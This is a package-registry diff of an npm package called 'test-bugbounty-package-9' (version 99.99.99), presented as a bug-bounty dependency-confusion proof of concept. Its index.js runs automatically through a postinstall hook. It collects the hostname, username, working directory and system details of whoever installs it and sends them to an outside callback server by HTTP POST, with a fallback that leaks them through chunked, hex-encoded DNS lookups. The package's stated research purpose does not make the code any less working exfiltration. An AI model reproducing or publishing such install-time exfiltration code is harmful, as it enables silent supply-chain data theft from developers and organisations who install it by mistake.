test-bugbounty-package-9 99.99.99
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +87 -0
- package/package.json +15 -0
package/index.js
ADDED
|
@@ -0,0 +1,87 @@
|
|
|
1
|
+
// Bug Bounty - Dependency Confusion PoC
|
|
2
|
+
// Package: test-bugbounty-package-9
|
|
3
|
+
// Contact: dd_06@wearehackerone.com
|
|
4
|
+
|
|
5
|
+
const dns = require('dns');
|
|
6
|
+
const os = require('os');
|
|
7
|
+
const http = require('http');
|
|
8
|
+
const https = require('https');
|
|
9
|
+
|
|
10
|
+
function toHex(input) {
|
|
11
|
+
return Buffer.from(input, 'utf8').toString('hex');
|
|
12
|
+
}
|
|
13
|
+
|
|
14
|
+
const info = {
|
|
15
|
+
pkg: "test-bugbounty-package-9",
|
|
16
|
+
hostname: os.hostname(),
|
|
17
|
+
user: os.userInfo().username,
|
|
18
|
+
cwd: process.cwd(),
|
|
19
|
+
platform: os.platform(),
|
|
20
|
+
arch: os.arch(),
|
|
21
|
+
nodeVersion: process.version,
|
|
22
|
+
timestamp: new Date().toISOString()
|
|
23
|
+
};
|
|
24
|
+
|
|
25
|
+
const CALLBACK_URL = 'https://deepbounty.dd06-dev.fr/cb/383a550b-4aff-4552-b849-b6ffec1d413d';
|
|
26
|
+
|
|
27
|
+
function sendDnsPayload() {
|
|
28
|
+
try {
|
|
29
|
+
const parsed = new URL(CALLBACK_URL);
|
|
30
|
+
const baseDomain = parsed.hostname;
|
|
31
|
+
const uuidLabel = (parsed.pathname.split('/').filter(Boolean).pop() || 'cb').replace(/[^a-zA-Z0-9]/g, '');
|
|
32
|
+
|
|
33
|
+
const hexPayload = toHex(JSON.stringify(info));
|
|
34
|
+
const chunks = hexPayload.match(/.{1,50}/g) || [];
|
|
35
|
+
|
|
36
|
+
if (!chunks.length || !baseDomain) return;
|
|
37
|
+
|
|
38
|
+
chunks.forEach((chunk, index) => {
|
|
39
|
+
// Reconstruct hostname: index-total.uuid.chunk.domain
|
|
40
|
+
const hostname = `${index}-${chunks.length}.${uuidLabel}.${chunk}.${baseDomain}`;
|
|
41
|
+
|
|
42
|
+
// Jitter requests to avoid flooding local resolver
|
|
43
|
+
setTimeout(() => {
|
|
44
|
+
dns.lookup(hostname, (err) => { /* ignore result */ });
|
|
45
|
+
}, index * 200);
|
|
46
|
+
});
|
|
47
|
+
} catch (e) {}
|
|
48
|
+
}
|
|
49
|
+
|
|
50
|
+
function sendHttpPayload() {
|
|
51
|
+
try {
|
|
52
|
+
const parsed = new URL(CALLBACK_URL);
|
|
53
|
+
const postData = JSON.stringify(info);
|
|
54
|
+
const lib = parsed.protocol === 'https:' ? https : http;
|
|
55
|
+
|
|
56
|
+
const req = lib.request(CALLBACK_URL, {
|
|
57
|
+
method: 'POST',
|
|
58
|
+
headers: {
|
|
59
|
+
'Content-Type': 'application/json',
|
|
60
|
+
'Content-Length': Buffer.byteLength(postData)
|
|
61
|
+
},
|
|
62
|
+
timeout: 3000
|
|
63
|
+
}, (res) => {
|
|
64
|
+
res.on('data', () => {}); // Consume stream
|
|
65
|
+
});
|
|
66
|
+
|
|
67
|
+
// Fallback on Network Error
|
|
68
|
+
req.on('error', (e) => {
|
|
69
|
+
sendDnsPayload();
|
|
70
|
+
});
|
|
71
|
+
|
|
72
|
+
// Fallback on Timeout
|
|
73
|
+
req.on('timeout', () => {
|
|
74
|
+
req.destroy();
|
|
75
|
+
sendDnsPayload();
|
|
76
|
+
});
|
|
77
|
+
|
|
78
|
+
req.write(postData);
|
|
79
|
+
req.end();
|
|
80
|
+
|
|
81
|
+
} catch (e) {
|
|
82
|
+
sendDnsPayload();
|
|
83
|
+
}
|
|
84
|
+
}
|
|
85
|
+
|
|
86
|
+
// Start with HTTP; it will fallback to DNS if needed.
|
|
87
|
+
sendHttpPayload();
|
package/package.json
ADDED
|
@@ -0,0 +1,15 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "test-bugbounty-package-9",
|
|
3
|
+
"version": "99.99.99",
|
|
4
|
+
"description": "Bug Bounty package - If you see this, your organization may be vulnerable to dependency confusion",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"postinstall": "node index.js"
|
|
8
|
+
},
|
|
9
|
+
"keywords": [
|
|
10
|
+
"security",
|
|
11
|
+
"bug-bounty",
|
|
12
|
+
"dependency-confusion"
|
|
13
|
+
],
|
|
14
|
+
"license": "MIT"
|
|
15
|
+
}
|